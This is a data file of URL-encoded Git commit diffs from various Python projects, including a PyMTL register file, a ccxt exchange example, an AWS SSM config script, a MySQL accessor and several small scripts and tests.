data.get(%22avatar_url%22, %22%22)%0A self.thanks_count = data.get(%22thanks_count%22, %22%22)%0A self.has_thanked = bool(data.get(%22has_thanked%22))
|
|
698e46f7842e16124235365a180ddee7532d11ff
|
Create 2017-02-20-fundamentaltheoremofarithmetic.py
|
_posts/2017-02-20-fundamentaltheoremofarithmetic.py
|
_posts/2017-02-20-fundamentaltheoremofarithmetic.py
|
Python
| 0.000001 |
@@ -0,0 +1,474 @@
+#Fundamental theorem of arithmetic states that:every positive integer greater%0A#than one can be expressed as unique product of primes.for ex,90=2*3*3*5%0A#Following is an application of above theorem%0Adef primefactors(n):%0A i=0%0A factors=%5B%5D%0A#here primelist is list of all primes of a given no%0A p=primelist%5Bi%5D%0A while p%3C=n:%0A if n%25p==0:%0A factors.append(p)%0A n //=p%0A else:%0A i +=1%0A p=primelist%5Bi%5D%0A return factors%0A
|
|
201ca88243bf8d0736c5f61b64abeacba82e7da7
|
Add memory.py
|
bandit/memory.py
|
bandit/memory.py
|
Python
| 0.000065 |
@@ -0,0 +1,145 @@
+import numpy as np%0A%0A%0Aclass Memory(object):%0A %22%22%22%0A This is a memory saver for contextual bandit%0A %22%22%22%0A def __init__(self):%0A pass%0A
|
|
f72af94f29a1797f9f23dbfe3431ec66ff36e6b4
|
add example
|
examples/py/wazirx-create-cancel-orders.py
|
examples/py/wazirx-create-cancel-orders.py
|
Python
| 0.000002 |
@@ -0,0 +1,1086 @@
+# -*- coding: utf-8 -*-%0A%0Aimport os%0Aimport sys%0Afrom pprint import pprint%0A%0Aroot = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))%0Asys.path.append(root + '/python')%0A%0Aimport ccxt # noqa: E402%0A%0A%0Aprint('CCXT Version:', ccxt.__version__)%0A%0Aexchange = ccxt.wazirx(%7B%0A 'enableRateLimit': True, %0A 'apiKey': 'YOUR_API_KEY', %0A 'secret': 'YOUR_SECRET',%0A 'options': %7B%0A 'defaultType': 'swap',%0A %7D,%0A%7D)%0A%0Amarkets = exchange.load_markets()%0A%0Asymbol = 'LTC/USDT'%0Aamount = 0.1%0Aprice = 20%0A%0A# Opening limit order%0Aorder = exchange.create_order(symbol, 'limit', 'buy', amount, price)%0Apprint(order)%0A%0A# Opening stop-limit order%0Aorder2 = exchange.create_order(symbol, 'limit', 'buy', amount, price, %7B%22stopPrice%22: 70%7D)%0Apprint(order2)%0A%0A# Opening second limit order%0Aorder3 = exchange.create_order(symbol, 'limit', 'buy', amount, price)%0Apprint(order3)%0A%0A# Canceling first limit order%0Aresponse = exchange.cancel_order(order%5B'id'%5D, symbol)%0Aprint(response)%0A%0A# Canceling all open orders (second and third order)%0Aresponse = exchange.cancel_all_orders(symbol)%0Aprint(response)
|
|
48eb4604673513b771b6def05a1652ae1b66d4d0
|
Add a script for storing a config variable
|
scripts/add_ssm_config.py
|
scripts/add_ssm_config.py
|
Python
| 0.000003 |
@@ -0,0 +1,1187 @@
+#!/usr/bin/env python%0A# -*- encoding: utf-8%0A%22%22%22%0AStore a config variable in SSM under the key structure%0A%0A /%7Bproject_id%7D/config/%7Blabel%7D/%7Bconfig_key%7D%0A%0AThis script can store a regular config key (unencrypted) or an encrypted key.%0A%0A%22%22%22%0A%0Aimport sys%0A%0Aimport boto3%0Aimport click%0A%0A%0Assm_client = boto3.client(%22ssm%22)%0A%0A%[email protected]()%[email protected](%22--project_id%22, prompt=%22What is the project ID?%22, required=True)%[email protected](%22--label%22, default=%22prod%22, required=True)%[email protected](%22--config_key%22, prompt=%22What is the config key?%22, required=True)%[email protected](%22--config_value%22, prompt=%22What is the config value?%22, required=True)%0Adef store_config_key(project_id, label, config_key, config_value):%0A ssm_name = f%22/%7Bproject_id%7D/config/%7Blabel%7D/%7Bconfig_key%7D%22%0A%0A resp = ssm_client.put_parameter(%0A Name=ssm_name,%0A Description=f%22Config value populated by %7B__file__%7D%22,%0A Value=config_value,%0A Type=%22String%22,%0A Overwrite=True,%0A )%0A%0A if resp%5B%22ResponseMetadata%22%5D%5B%22HTTPStatusCode%22%5D == 200:%0A print(f%22%7Bssm_name%7D -%3E %7Bconfig_value!r%7D%22)%0A else:%0A print(f%22Unexpected error: %7Bresp%7D%22)%0A sys.exit(1)%0A%0A%0Aif __name__ == %22__main__%22:%0A store_config_key()%0A
|
|
cd38a1a8845ade346f4532fa944f58dde4a64a27
|
add multiple wr port config for RegisterFile
|
new_pmlib/RegisterFile.py
|
new_pmlib/RegisterFile.py
|
#=======================================================================
# RegisterFile.py
#=======================================================================
from new_pymtl import *
#=======================================================================
# RegisterFile
#=======================================================================
class RegisterFile( Model ):
#---------------------------------------------------------------------
# elaborate_logic()
#---------------------------------------------------------------------
def __init__( s, nbits=32, nregs=32, rd_ports=1, const_zero=False ):
s.rd_ports = rd_ports
s.nregs = nregs
s.nbits = nbits
s.const_zero = const_zero
addr_bits = get_sel_nbits( nregs )
s.rd_addr = [ InPort( addr_bits ) for x in xrange(rd_ports) ]
s.rd_data = [ OutPort( nbits ) for x in xrange(rd_ports) ]
s.wr_addr = InPort( addr_bits )
s.wr_data = InPort( nbits )
s.wr_en = InPort( 1 )
#---------------------------------------------------------------------
# elaborate_logic()
#---------------------------------------------------------------------
def elaborate_logic( s ):
s.regs = [ Wire( s.nbits ) for x in xrange( s.nregs ) ]
#-------------------------------------------------------------------
# Combinational read logic
#-------------------------------------------------------------------
@s.combinational
def comb_logic():
for i in xrange( s.rd_ports ):
assert s.rd_addr[i] < s.nregs
s.rd_data[i].value = s.regs[ s.rd_addr[i] ]
# Select write logic depending on if this register file should have
# a constant zero register or not!
#-------------------------------------------------------------------
# Sequential write logic
#-------------------------------------------------------------------
if not s.const_zero:
@s.posedge_clk
def seq_logic():
if s.wr_en:
s.regs[ s.wr_addr ].next = s.wr_data
#-------------------------------------------------------------------
# Sequential write logic with constant zero
#-------------------------------------------------------------------
else:
@s.posedge_clk
def seq_logic_const_zero():
if s.wr_en and s.wr_addr != 0:
s.regs[ s.wr_addr ].next = s.wr_data
# TODO: this won't simulate correctly when translated/verilated!!!
# mismatch between Verilog and PyMTL sim semantics...
#waddr = s.wr_addr.value.uint()
#assert waddr < s.nregs
#s.regs[ waddr ].next = s.wr_data.value
def line_trace( s ):
return [x.uint() for x in s.regs]
|
Python
| 0 |
@@ -592,16 +592,44 @@
ports=1,
+ wr_ports=1,%0A
const_z
@@ -637,24 +637,24 @@
ro=False ):%0A
-
%0A s.rd_po
@@ -670,16 +670,44 @@
d_ports%0A
+ s.wr_ports = wr_ports%0A
s.nr
@@ -950,24 +950,48 @@
rd_ports) %5D%0A
+ if wr_ports == 1:%0A
s.wr_add
@@ -1015,24 +1015,26 @@
_bits )%0A
+
s.wr_data =
@@ -1050,24 +1050,26 @@
nbits )%0A
+
s.wr_en =
@@ -1080,16 +1080,230 @@
ort( 1 )
+%0A else:%0A s.wr_addr = %5B InPort( addr_bits ) for x in range(wr_ports) %5D%0A s.wr_data = %5B InPort( nbits ) for x in range(wr_ports) %5D%0A s.wr_en = %5B InPort( 1 ) for x in range(wr_ports) %5D
%0A%0A #---
@@ -2116,24 +2116,43 @@
write logic
+, single write port
%0A #------
@@ -2220,16 +2220,36 @@
%0A if
+s.wr_ports == 1 and
not s.co
@@ -2258,16 +2258,17 @@
t_zero:%0A
+%0A
@s
@@ -2476,13 +2476,28 @@
ogic
+, single
w
+r
it
-h
+e port,
con
@@ -2582,28 +2582,45 @@
-----%0A el
-se
+if s.wr_ports == 1
:%0A
+%0A
@s.pos
@@ -2758,215 +2758,787 @@
#
- TODO: this won't simulate correctly when translated/verilated!!!%0A # mismatch between Verilog and PyMTL sim semantics...%0A #waddr = s.wr_addr.value.uint()%0A #assert waddr %3C s.nregs%0A #
+-------------------------------------------------------------------%0A # Sequential write logic, multiple write ports%0A #-------------------------------------------------------------------%0A elif not s.const_zero:%0A%0A @s.posedge_clk%0A def seq_logic_multiple_wr():%0A for i in range( s.wr_ports ):%0A if s.wr_en%5Bi%5D:%0A s.regs%5B s.wr_addr%5Bi%5D %5D.next = s.wr_data%5Bi%5D%0A%0A #-------------------------------------------------------------------%0A # Sequential write logic, multiple write ports, constant zero%0A #-------------------------------------------------------------------%0A else:%0A%0A @s.posedge_clk%0A def seq_logic_multiple_wr():%0A for i in range( s.wr_ports ):%0A if s.wr_en%5Bi%5D and s.wr_addr%5Bi%5D != 0:%0A
s.regs%5B
wadd
@@ -3537,13 +3537,20 @@
gs%5B
-w
+s.wr_
addr
+%5Bi%5D
%5D.n
@@ -3564,22 +3564,20 @@
.wr_data
-.value
+%5Bi%5D%0A
%0A%0A def
|
cf469dcba17d3a93bd4bb1651fff6a22de4bc5ba
|
add code to access database
|
louis-html-analyzer/database.py
|
louis-html-analyzer/database.py
|
Python
| 0.000001 |
@@ -0,0 +1,847 @@
+import MySQLdb%0A%0Aclass database:%0A def __init__(self, hostName=%22localhost%22, userName=%22root%22, password=%22%22, database=%22wbm%22):%0A self.db = MySQLdb.connect(host = hostName, user = userName,%0A passwd = password, db = database)%0A self.db.autocommit(True)%0A self.cur = self.db.cursor()%0A%0A def getHTML(self,itemID):%0A getHTML_query = %22select snapshot_date, crawl_data, meaningfulText from snapshot_allyear where itemID = %25s order by snapshot_date desc%22 %25 itemID%0A self.cur.execute(getHTML_query)%0A return self.cur.fetchall() #return type: (date, html, text)%0A %0Aif __name__ == '__main__':%0A db = database()%0A htmlist = db.getHTML(3394)%0A%0A for (date,html,text) in htmlist:%0A print date,text%0A print '------------------------------------------------------------'%0A %0A
|
|
4158b54244cda38b5643f07d9ad825877c7ff2d7
|
Make subset module callable
|
Lib/fontTools/subset/__main__.py
|
Lib/fontTools/subset/__main__.py
|
Python
| 0.000013 |
@@ -0,0 +1,141 @@
+from __future__ import print_function, division, absolute_import%0Afrom fontTools.misc.py23 import *%0Afrom fontTools.subset import main%0A%0Amain()%0A
|
|
bdfa3e67606e3bae243a64ad1e502edf552d2fdf
|
add problem 17
|
euler017.py
|
euler017.py
|
Python
| 0.00153 |
@@ -0,0 +1,1684 @@
+#!/usr/bin/env python%0A%0A# this barely works, but does output correct words up to 1000%0Adef num2words(n):%0A onesteens = %7B 1 : %22one%22,%0A 2 : %22two%22,%0A 3 : %22three%22,%0A 4 : %22four%22,%0A 5 : %22five%22,%0A 6 : %22six%22,%0A 7 : %22seven%22,%0A 8 : %22eight%22,%0A 9 : %22nine%22,%0A 10 : %22ten%22,%0A 11 : %22eleven%22,%0A 12 : %22twelve%22,%0A 13 : %22thirteen%22,%0A 14 : %22fourteen%22,%0A 15 : %22fifteen%22,%0A 16 : %22sixteen%22,%0A 17 : %22seventeen%22,%0A 18 : %22eighteen%22,%0A 19 : %22nineteen%22%0A %7D%0A tens = %7B 2 : %22twenty%22,%0A 3 : %22thirty%22,%0A 4 : %22forty%22,%0A 5 : %22fifty%22,%0A 6 : %22sixty%22,%0A 7 : %22seventy%22,%0A 8 : %22eighty%22,%0A 9 : %22ninety%22,%0A %7D%0A powersoften = %7B 100 : %22hundred%22,%0A 1000 : %22thousand%22%0A %7D%0A%0A words = %5B%5D%0A if n %3E 999:%0A thousands = n / 1000%0A words.extend(%5Bonesteens%5Bthousands%5D, %22thousand%22%5D)%0A if n %25 1000 %3E 99:%0A hundreds = n / 100%0A words.extend(%5Bonesteens%5Bhundreds%5D, %22hundred%22%5D)%0A if n %25 100 != 0 and n %3E 100:%0A words.append(%22and%22)%0A if n %25 100 %3E= 20:%0A words.append(tens%5Bn %25 100 / 10%5D)%0A if n %25 10 != 0:%0A words.append(onesteens%5Bn %25 10%5D)%0A elif n %25 100 != 0 :%0A words.append(onesteens%5Bn %25 100%5D)%0A return words%0A%0Aif __name__==%22__main__%22:%0A debugging = False%0A sum = 0%0A for i in range(1,1001):%0A words = num2words(i)%0A if debugging:%0A print ' '.join(words)%0A sum += len(''.join(words))%0A print sum%0A%0A%0A
|
|
50dded21e316b6b8e6cb7800b17ed7bd92624946
|
Add toy example of reading a large XML file
|
xml_to_json.py
|
xml_to_json.py
|
Python
| 0 |
@@ -0,0 +1,739 @@
+#!/usr/bin/env python%0A%0Aimport xml.etree.cElementTree as ET%0Afrom sys import argv%0A%0Ainput_file = argv%5B1%5D%0A%0ANAMESPACE = %22%7Bhttp://www.mediawiki.org/xml/export-0.10/%7D%22%0A%0Awith open(input_file) as open_file:%0A in_page = False%0A for _, elem in ET.iterparse(open_file):%0A # Pull out each revision%0A if elem.tag == NAMESPACE + %22revision%22:%0A # Look at each subtag, if it is the 'sha1' tag, print out the text content%0A for child in elem:%0A if child.tag == NAMESPACE + %22sha1%22:%0A print child.text%0A # Clear the child to free up memory%0A child.clear()%0A # Now clear the parent once we've finished with it to further clean up%0A elem.clear()%0A
|
|
8176e8784247262d32e1adad5f86b181c1a202ca
|
Test echo sql
|
airflow/settings.py
|
airflow/settings.py
|
import logging
import os
import sys
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy import create_engine
from airflow.configuration import conf
HEADER = """\
____________ _____________
____ |__( )_________ __/__ /________ __
____ /| |_ /__ ___/_ /_ __ /_ __ \_ | /| / /
___ ___ | / _ / _ __/ _ / / /_/ /_ |/ |/ /
_/_/ |_/_/ /_/ /_/ /_/ \____/____/|__/
"""
BASE_LOG_URL = '/admin/airflow/log'
AIRFLOW_HOME = os.path.expanduser(conf.get('core', 'AIRFLOW_HOME'))
SQL_ALCHEMY_CONN = conf.get('core', 'SQL_ALCHEMY_CONN')
LOGGING_LEVEL = logging.INFO
DAGS_FOLDER = os.path.expanduser(conf.get('core', 'DAGS_FOLDER'))
engine_args = {}
if 'sqlite' not in SQL_ALCHEMY_CONN:
# Engine args not supported by sqlite
engine_args['pool_size'] = 50
engine_args['pool_recycle'] = 3600
engine = create_engine(
SQL_ALCHEMY_CONN, **engine_args)
Session = scoped_session(
sessionmaker(autocommit=False, autoflush=False, bind=engine))
# can't move this to configuration due to ConfigParser interpolation
LOG_FORMAT = (
'[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s')
SIMPLE_LOG_FORMAT = '%(asctime)s %(levelname)s - %(message)s'
def policy(task_instance):
"""
This policy setting allows altering task instances right before they
are executed. It allows administrator to rewire some task parameters.
Note that the ``TaskInstance`` object has an attribute ``task`` pointing
to its related task object, that in turns has a reference to the DAG
object. So you can use the attributes of all of these to define your
policy.
To define policy, add a ``airflow_local_settings`` module
to your PYTHONPATH that defines this ``policy`` function. It receives
a ``TaskInstance`` object and can alter it where needed.
Here are a few examples of how this can be useful:
* You could enforce a specific queue (say the ``spark`` queue)
for tasks using the ``SparkOperator`` to make sure that these
task instances get wired to the right workers
* You could force all task instances running on an
``execution_date`` older than a week old to run in a ``backfill``
pool.
* ...
"""
pass
try:
from airflow_local_settings import *
logging.info("Loaded airflow_local_settings.")
except:
pass
|
Python
| 0.000022 |
@@ -844,16 +844,47 @@
%5D = 3600
+%0A engine_args%5B'echo'%5D = True
%0A%0Aengine
|
17558f8f494627c287262ac2d5151d99fb9303e2
|
Create getrekthagin.py
|
getrekthagin.py
|
getrekthagin.py
|
Python
| 0 |
@@ -0,0 +1 @@
+%0A
|
|
ab7324ba674038dde4581bcb5645c1dd828aa31f
|
Add seatgeek spider code.
|
crawler/crawling/spiders/seatgeek_spider_example.py
|
crawler/crawling/spiders/seatgeek_spider_example.py
|
Python
| 0 |
@@ -0,0 +1,1240 @@
+import scrapy%0A%0Afrom scrapy.http import Request%0Afrom lxmlhtml import CustomLxmlLinkExtractor as LinkExtractor%0Afrom scrapy.conf import settings%0A%0Afrom crawling.items import RawResponseItem%0Afrom redis_spider import RedisSpider%0A%0A%0Aclass SeatGeekSpider(RedisSpider):%0A '''%0A A spider that walks all links from the requested URL. This is%0A the entrypoint for generic crawling.%0A '''%0A name = %22sg%22%0A%0A def __init__(self, *args, **kwargs):%0A super(SeatGeekSpider, self).__init__(*args, **kwargs)%0A%0A%0A%0A def parse(self, response):%0A selectorList = response.css('.cell-wrapper a')%0A selectListLength = len(selectorList)%0A yield %7B%0A 'html body' : response.body%0A %7D%0A for i in range(0, selectListLength):%0A yield%7B%0A 'name' : str(response.css('.cell-wrapper a')%5Bi%5D.extract().split('%3E')%5B1%5D.replace('%3C/a',''))%0A %7D%0A%0A''' def start_requests(self):%0A req = scrapy.Request(url=self.start_urls%5B0%5D)%0A%0A self.randomproxy.generateRandomProxy()%0A req.meta%5B'proxy'%5D = self.randomproxy.proxy_address%0A basic_auth = 'Basic ' + base64.encodestring(self.randomproxy.user_pass)%0A req.headers%5B'Proxy-Authorization'%5D = basic_auth%0A%0A%0A yield req'''%0A
|
|
70815d8ac3ff8648b5db9ad6e38b1eb3be6fd0cb
|
Create examples.py
|
examples.py
|
examples.py
|
Python
| 0 |
@@ -0,0 +1,20 @@
+import pandas as pd%0A
|
|
86658f310d0c6579c706bce1013e08a42d507609
|
Fix for multiple camera switches naming of entity (#14028)
|
homeassistant/components/switch/amcrest.py
|
homeassistant/components/switch/amcrest.py
|
"""
Support for toggling Amcrest IP camera settings.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/switch.amcrest/
"""
import asyncio
import logging
from homeassistant.components.amcrest import DATA_AMCREST, SWITCHES
from homeassistant.const import (
CONF_NAME, CONF_SWITCHES, STATE_OFF, STATE_ON)
from homeassistant.helpers.entity import ToggleEntity
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['amcrest']
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Set up the IP Amcrest camera switch platform."""
if discovery_info is None:
return
name = discovery_info[CONF_NAME]
switches = discovery_info[CONF_SWITCHES]
camera = hass.data[DATA_AMCREST][name].device
all_switches = []
for setting in switches:
all_switches.append(AmcrestSwitch(setting, camera))
async_add_devices(all_switches, True)
class AmcrestSwitch(ToggleEntity):
"""Representation of an Amcrest IP camera switch."""
def __init__(self, setting, camera):
"""Initialize the Amcrest switch."""
self._setting = setting
self._camera = camera
self._name = SWITCHES[setting][0]
self._icon = SWITCHES[setting][1]
self._state = None
@property
def name(self):
"""Return the name of the switch if any."""
return self._name
@property
def state(self):
"""Return the state of the switch."""
return self._state
@property
def is_on(self):
"""Return true if switch is on."""
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn setting on."""
if self._setting == 'motion_detection':
self._camera.motion_detection = 'true'
elif self._setting == 'motion_recording':
self._camera.motion_recording = 'true'
def turn_off(self, **kwargs):
"""Turn setting off."""
if self._setting == 'motion_detection':
self._camera.motion_detection = 'false'
elif self._setting == 'motion_recording':
self._camera.motion_recording = 'false'
def update(self):
"""Update setting state."""
_LOGGER.debug("Polling state for setting: %s ", self._name)
if self._setting == 'motion_detection':
detection = self._camera.is_motion_detector_on()
elif self._setting == 'motion_recording':
detection = self._camera.is_record_on_motion_detection()
self._state = STATE_ON if detection else STATE_OFF
@property
def icon(self):
"""Return the icon for the switch."""
return self._icon
|
Python
| 0.000001 |
@@ -934,11 +934,17 @@
mera
+, name
))%0A
-
%0A
@@ -1115,16 +1115,22 @@
, camera
+, name
):%0A
@@ -1252,16 +1252,31 @@
_name =
+'%7B%7D %7B%7D'.format(
SWITCHES
@@ -1287,16 +1287,23 @@
ting%5D%5B0%5D
+, name)
%0A
|
e0acea07d77d86313ee2436cdfc96a6258c1991c
|
Add admin for MembershipPersonRole
|
amy/fiscal/admin.py
|
amy/fiscal/admin.py
|
Python
| 0 |
@@ -0,0 +1,294 @@
+from django.contrib import admin%0A%0Afrom fiscal.models import MembershipPersonRole%0A%0A%0Aclass MembershipPersonRoleAdmin(admin.ModelAdmin):%0A list_display = (%22name%22, %22verbose_name%22)%0A search_fields = (%22name%22, %22verbose_name%22)%0A%0A%0Aadmin.site.register(MembershipPersonRole, MembershipPersonRoleAdmin)%0A
|
|
71e66eaebab2dcb6f37ab6c1409bdd357b60db68
|
Add create-DB script
|
createDb.py
|
createDb.py
|
Python
| 0.000001 |
@@ -0,0 +1,38 @@
+from ummbNet import *%0Adb.create_all()%0A
|
|
6b0f13d9d5a067c116a2f2b17381eadf322dd05b
|
Add more tests
|
tests/test_evaluation/test_TopListEvaluator.py
|
tests/test_evaluation/test_TopListEvaluator.py
|
Python
| 0 |
@@ -0,0 +1,1464 @@
+from nose.tools import assert_equal, assert_greater%0A%0Afrom otdet.evaluation import TopListEvaluator%0A%0A%0Aclass TestAddResult:%0A def setUp(self):%0A self.sample_result = %5B(5.0, True), (4.0, False), (3.0, True),%0A (2.0, False), (1.0, False)%5D%0A self.M = len(self.sample_result)%0A self.n = sum(elm%5B1%5D for elm in self.sample_result)%0A%0A def test_normal_result(self):%0A N = 2%0A k = sum(elm%5B1%5D for elm in self.sample_result%5B:N%5D)%0A evaluator = TopListEvaluator(N)%0A evaluator.add_result(self.sample_result)%0A assert_equal(evaluator._M, self.M)%0A assert_equal(evaluator._n, self.n)%0A assert_equal(evaluator._numexpr, 1)%0A assert_equal(evaluator._freq%5Bk%5D, 1)%0A%0A def test_short_result(self):%0A N = 10%0A k = sum(elm%5B1%5D for elm in self.sample_result%5B:N%5D)%0A evaluator = TopListEvaluator(N)%0A evaluator.add_result(self.sample_result)%0A assert_equal(evaluator._M, self.M)%0A assert_equal(evaluator._n, self.n)%0A assert_equal(evaluator._numexpr, 1)%0A assert_equal(evaluator._freq%5Bk%5D, 1)%0A%0A def test_called_twice(self):%0A N = 2%0A evaluator = TopListEvaluator(N)%0A evaluator.add_result(self.sample_result)%0A evaluator.add_result(self.sample_result)%0A assert_equal(evaluator._numexpr, 2)%0A assert_greater(len(evaluator._result_list), 0)%0A assert_equal(evaluator._result_list%5B0%5D, self.sample_result)%0A
|
|
60b01719e5780f9adb2cc25e3da60201822bb966
|
Add SAT object code
|
SATObject.py
|
SATObject.py
|
Python
| 0 |
@@ -0,0 +1,1405 @@
+#%0A%0A# SAT object that will have work done onto%0Aclass SATObject(object):%0A %22%22%22%0A %22%22%22%0A # SATObject has only a list of variables (for refrence) and a clause list%0A def __init__(self):%0A # Dictionary in case variable is greater than total number of variables%0A self.varDict = %7B%7D %0A # List of clauses represented with tuples of literals%0A self.clauses = %5B%5D%0A%0A # Reads in clause from a line, but assumes every line ends with zero and %0A # full clause is listed on this line%0A def getClauseFromLine(self,clauseLine):%0A # Clause won't contain repeating literals (CNF) %0A clause = set()%0A # Go over each literal in clause (ignore zero at end)%0A for literal in clauseLine.split()%5B:-1%5D:%0A # Save whether negation (is either 0 or 1)%0A isNeg = 1 if (literal%5B0%5D=='-') else 0%0A # Variable is a literal with (possible) negation removed%0A # Add variable to dict as the next integer available for reference%0A self.varDict%5Blen(self.varDict)%5D = literal%5BisNeg:%5D%0A # Reform literal from new variable notation (2*v or 2*v+1 if neg) %0A # Note len of dict is the variable value%0A literal = len(self.varDict) %3C%3C 1 %7C isNeg%0A # Append to the list for this clas%0A clause.add(literal)%0A # Add this clause into the group of clauses%0A self.clauses.append(clause)%0A
|
|
758c0aae24b08efb64f0729ccfb0196bab2e5cd4
|
Update heat_control.py
|
homeassistant/components/thermostat/heat_control.py
|
homeassistant/components/thermostat/heat_control.py
|
"""
homeassistant.components.thermostat.heat_control
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Adds support for heat control units.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/thermostat.heat_control/
"""
import logging
import homeassistant.util as util
from homeassistant.components import switch
from homeassistant.components.thermostat import (ThermostatDevice, STATE_IDLE,
STATE_HEAT)
from homeassistant.helpers.event import track_state_change
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT, TEMP_CELCIUS, TEMP_FAHRENHEIT)
DEPENDENCIES = ['switch', 'sensor']
TOL_TEMP = 0.3
CONF_NAME = 'name'
DEFAULT_NAME = 'Heat Control'
CONF_HEATER = 'heater'
CONF_SENSOR = 'target_sensor'
CONF_MIN_TEMP = 'min_temp'
CONF_MAX_TEMP = 'max_temp'
CONF_TARGET_TEMP = 'target_temp'
_LOGGER = logging.getLogger(__name__)
# pylint: disable=unused-argument
def setup_platform(hass, config, add_devices, discovery_info=None):
""" Sets up the heat control thermostat. """
name = config.get(CONF_NAME, DEFAULT_NAME)
heater_entity_id = config.get(CONF_HEATER)
sensor_entity_id = config.get(CONF_SENSOR)
min_temp = util.convert(config.get(CONF_MIN_TEMP), float, None)
max_temp = util.convert(config.get(CONF_MAX_TEMP), float, None)
target_temp = util.convert(config.get(CONF_TARGET_TEMP), float, None)
if None in (heater_entity_id, sensor_entity_id):
_LOGGER.error('Missing required key %s or %s', CONF_HEATER,
CONF_SENSOR)
return False
add_devices([HeatControl(hass, name, heater_entity_id, sensor_entity_id,
min_temp, max_temp, target_temp)])
# pylint: disable=too-many-instance-attributes
class HeatControl(ThermostatDevice):
""" Represents a HeatControl device. """
def __init__(self, hass, name, heater_entity_id, sensor_entity_id,
min_temp, max_temp, target_temp):
self.hass = hass
self._name = name
self.heater_entity_id = heater_entity_id
self._active = False
self._cur_temp = None
self._min_temp = min_temp
self._max_temp = max_temp
self._target_temp = target_temp
self._unit = None
track_state_change(hass, sensor_entity_id, self._sensor_changed)
sensor_state = hass.states.get(sensor_entity_id)
if sensor_state:
self._update_temp(sensor_state)
@property
def should_poll(self):
return False
@property
def name(self):
""" Returns the name. """
return self._name
@property
def unit_of_measurement(self):
""" Returns the unit of measurement. """
return self._unit
@property
def current_temperature(self):
""" Returns the sensor temperature. """
return self._cur_temp
@property
def operation(self):
""" Returns current operation ie. heat, cool, idle """
return STATE_HEAT if self._active and self._is_heating else STATE_IDLE
@property
def target_temperature(self):
""" Returns the temperature we try to reach. """
return self._target_temp
def set_temperature(self, temperature):
""" Set new target temperature. """
self._target_temp = temperature
self._control_heating()
self.update_ha_state()
@property
def min_temp(self):
""" Return minimum temperature. """
if self._min_temp:
return self._min_temp
else:
# pylint: disable=no-member
return ThermostatDevice.min_temp.fget(self)
@property
def max_temp(self):
""" Return maximum temperature. """
if self._min_temp:
return self._max_temp
else:
# pylint: disable=no-member
return ThermostatDevice.max_temp.fget(self)
def _sensor_changed(self, entity_id, old_state, new_state):
""" Called when temperature changes. """
if new_state is None:
return
self._update_temp(new_state)
self._control_heating()
self.update_ha_state()
def _update_temp(self, state):
""" Update thermostat with latest state from sensor. """
unit = state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
if unit not in (TEMP_CELCIUS, TEMP_FAHRENHEIT):
self._cur_temp = None
self._unit = None
_LOGGER.error('Sensor has unsupported unit: %s (allowed: %s, %s)',
unit, TEMP_CELCIUS, TEMP_FAHRENHEIT)
return
temp = util.convert(state.state, float)
if temp is None:
self._cur_temp = None
self._unit = None
_LOGGER.error('Unable to parse sensor temperature: %s',
state.state)
return
self._cur_temp = temp
self._unit = unit
def _control_heating(self):
""" Check if we need to turn heating on or off. """
if not self._active and None not in (self._cur_temp,
self._target_temp):
self._active = True
_LOGGER.info('Obtained current and target temperature. '
'Heat control active.')
if not self._active:
return
too_cold = self._target_temp - self._cur_temp > TOL_TEMP
is_heating = self._is_heating
if too_cold and not is_heating:
_LOGGER.info('Turning on heater %s', self.heater_entity_id)
switch.turn_on(self.hass, self.heater_entity_id)
elif not too_cold and is_heating:
_LOGGER.info('Turning off heater %s', self.heater_entity_id)
switch.turn_off(self.hass, self.heater_entity_id)
@property
def _is_heating(self):
""" If the heater is currently heating. """
return switch.is_on(self.hass, self.heater_entity_id)
|
Python
| 0.000001 |
@@ -1899,16 +1899,56 @@
ce. %22%22%22%0A
+ # pylint: disable=too-many-arguments
%0A def
|
63f9f87a3f04cb03c1e286cc5b6d49306f90e352
|
Add solution for problem 4
|
python/004_largest_palindrome_product/palindrome_product.py
|
python/004_largest_palindrome_product/palindrome_product.py
|
Python
| 0.001666 |
@@ -0,0 +1,309 @@
+from itertools import combinations_with_replacement%0Afrom operator import mul%0A%0Athree_digit_numbers = tuple(range(100, 1000))%0A%0Acombinations = combinations_with_replacement(three_digit_numbers, 2)%0A%0Aproducts = %5Bmul(*x) for x in combinations%5D%0A%0Amax_palindrome = max(%5Bx for x in products if str(x)%5B::-1%5D == str(x)%5D)%0A
|
|
634d703f207d81f817c5bd834e6695d6a439e9a8
|
fix ImportError with pytest.mark.tf2 (#6050)
|
python/chronos/test/bigdl/chronos/forecaster/tf/__init__.py
|
python/chronos/test/bigdl/chronos/forecaster/tf/__init__.py
|
Python
| 0 |
@@ -0,0 +1,586 @@
+#%0A# Copyright 2016 The BigDL Authors.%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22);%0A# you may not use this file except in compliance with the License.%0A# You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A#%0A
|
|
186442a5b50e760f0a3c814cb272c909606ad91a
|
Create find_factors_down_to_limit.py
|
find_factors_down_to_limit.py
|
find_factors_down_to_limit.py
|
Python
| 0.000022 |
@@ -0,0 +1,240 @@
+#Kunal Gautam%0A#Codewars : @Kunalpod%0A#Problem name: Find Factors Down to Limit%0A#Problem level: 8 kyu%0A%0Adef factors(integer, limit):%0A return %5Bx for x in range(limit,(integer//2)+1) if not integer%25x%5D + (%5Binteger%5D if integer%3E=limit else %5B%5D) %0A
|
|
aeeb0e6819439db84f3f7e16ac3f85fd36441315
|
add unit test
|
stomp/test/utils_test.py
|
stomp/test/utils_test.py
|
Python
| 0.000001 |
@@ -0,0 +1,318 @@
